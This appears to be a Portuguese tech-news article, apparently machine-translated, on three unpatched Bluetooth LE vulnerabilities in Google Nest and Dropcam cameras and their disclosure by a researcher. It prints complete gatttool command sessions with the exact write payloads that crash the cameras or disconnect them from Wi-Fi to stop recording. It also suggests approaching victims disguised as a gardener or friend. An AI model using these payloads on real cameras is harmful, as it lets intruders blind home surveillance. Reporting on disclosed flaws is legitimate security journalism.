As câmeras de vigilância em destaque do Google Nest são facilmente desativadas via Bluetooth

Inteligência artificial para detectar pessoas O Google AI Nest Outdoor Cam não economiza em hackers fáceis

A proteção com mais alta tecnologia nem sempre é a melhor. Ao adicionar complexidade ao sistema, você adiciona novos vetores de ataque. Acontece que é mais fácil para os seqüestradores roubar os carros mais caros e modernos com teclas de rádio do que as antigas "coisas de ferro". Sobre o mesmo com a segurança em outras áreas.

Outra vítima de crackers foram as sofisticadas câmeras de vigilância do Google Nest - modelos Dropcam, Dropcam Pro, Nest Cam Outdoor e Nest Cam. O código para hackers já foi publicado no GitHub , e o Google ainda não lançou patches. Você pode praticar desligando suas câmeras de vigilância hoje (as suas, é claro).

Foram publicadas informações sobre três vulnerabilidades, todas elas conectando-se à câmera via Bluetooth 4.0 LE (de acordo com as especificações, o alcance é de cerca de 100 m). O Bluetooth sempre funciona nessas câmeras, ou seja, geralmente é impossível desativá-lo, mesmo para o proprietário.

A primeira vulnerabilidade é o estouro de buffer com a opção SSID sobre Bluetooth. Para causar um estouro de buffer, você precisa tentar definir um novo parâmetro SSID com características incorretas na câmera.

Aqui está um exemplo de conexão com a câmera e configuração do comprimento do SSID de 1 e 16 bytes por vez.

anon@ubuntu:~/nest$ gatttool -b 18:B4:30:5D:00:B8 -t random -I
[18:B4:30:5D:00:B8][LE]> connect
Attempting to connect to 18:B4:30:5D:00:B8
Connection successful
[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3a031201AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3b
Characteristic value was written successfully
Characteristic value was written successfully
[18:B4:30:5D:00:B8][LE]>
(gatttool:20352): GLib-WARNING **: Invalid file descriptor.

Como resultado, a câmera será desligada, reiniciada após um erro e retornará ao seu estado operacional normal.

A segunda vulnerabilidade é semelhante à primeira, somente aqui o estouro de buffer é causado pelo envio de uma senha do tamanho errado (neste caso, três bytes e um byte). O resultado é o mesmo - a câmera reinicia após um erro com o retorno à condição de trabalho.

anon@ubuntu:~/nest$ gatttool -b 18:B4:30:5D:00:B8 -t random -I
[18:B4:30:5D:00:B8][LE]> connect
Attempting to connect to 18:B4:30:5D:00:B8
Connection successful
[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3a03120b506574536d6172742d356e1a01AAAAAA
[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3b
Characteristic value was written successfully
Characteristic value was written successfully
[18:B4:30:5D:00:B8][LE]>
(gatttool:20352): GLib-WARNING **: Invalid file descriptor.

A terceira vulnerabilidade é mais interessante. Ele permite que você desconecte temporariamente a câmera da rede WiFi, passando um novo SSID para a conexão. Nessas câmeras, o vídeo local não está disponível; portanto, a câmera transfere tudo via Wi-Fi - todo o arquivo é armazenado no serviço em nuvem. Consequentemente, durante a desconexão da rede, a gravação de vídeo não será salva. Demora cerca de 60 a 90 segundos para que a câmera retorne ao serviço após esse hack e retome a gravação do vídeo. Em princípio, este não é um intervalo tão longo, mas o hack pode ser repetido pelo período de tempo necessário.

anon@ubuntu:~/nest$ gatttool -b 18:B4:30:5D:00:B8 -t random -I
[18:B4:30:5D:00:B8][LE]> connect
Attempting to connect to 18:B4:30:5D:00:B8
Connection successful
[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3a03120b0a6574536d6172742d356e1a20232320
[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3becb824ba437c13233ac2ff78b1776456e47a01
[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3ca5787d2f5e53f394a512200228003210bc9253
[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3d48cada7a0d921d57b2d26ae89c3a04DEADBEEF
[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3e
Characteristic value was written successfully
Characteristic value was written successfully
Characteristic value was written successfully
Characteristic value was written successfully
Characteristic value was written successfully
[18:B4:30:5D:00:B8][LE]>

Observe que em todos os exemplos para conectar-se à câmera, você precisa saber o endereço MAC (18: B4: 30: 5D: 00: B8). Ele está simplesmente escrito no corpo da câmera, portanto, na prática de hackers, você primeiro terá que se aproximar da câmera a uma distância bastante próxima. Por exemplo, sob o disfarce de um cortador de grama, reparador ou amigo de uma futura vítima.


Uma das fotos da Nest Outdoor Cam mostra que o endereço MAC está escrito no corpo da câmera (linha acima do código QR). Os desenvolvedores o esconderam prudentemente atrás de um cabo de alimentação

Três vulnerabilidades nas câmeras estão presentes no firmware mais recente da câmera (5.2.1). O especialista em segurança Jason Doyle os encontrou no outono passado. Ele diz que se reportou ao Google em 26 de outubro de 2016, então agora parece que chegou a hora da divulgação para todos. Essa é uma prática padrão se o fabricante não tiver pressa ou não tiver tempo para corrigir os erros dentro de um prazo razoável. Nesse caso, quase cinco meses se passaram.

O Google geralmente paga recompensas aos pesquisadores por encontrar vulnerabilidades em seus produtos. A recompensa de vulnerabilidade do Google também se estende às câmeras de vídeo da Nest. É verdade que a Nest está na terceira categoria de maior prestígio, onde a recompensa máxima é de apenas US $ 5.000 (para o restante dos produtos - US $ 31.337). Além disso, nesta terceira categoria, há uma nota especial sobre um período de silêncio de seis meses. Embora o próprio Google tenha revelado recentemente o 0day explorado ativamente no Windows e Edge após 90 dias ( 1 , 2 ).

Jason Doyle não suportou o período de seis meses (26 de outubro a 17 de março), por isso não poderá reivindicar o prêmio. Diferentemente da prática usual, o Google não notificou o pesquisador sobre os prazos aproximados para o fechamento da vulnerabilidade e não deu suporte à correspondência com ele. Ao mesmo tempo, uma fonte familiarizada com a situação disse ao The Register que o patch estava quase pronto, então Jason não pôde tolerar muito de sua recompensa.

A propósito, algumas outras câmeras de vigilância semelhantes desativam o Bluetooth quando uma conexão Wi-Fi é estabelecida, para que não possam ser quebradas dessa maneira (por exemplo, Logitech Circle). O Google também poderia usar esse truque simples para se livrar desse tipo de vulnerabilidade.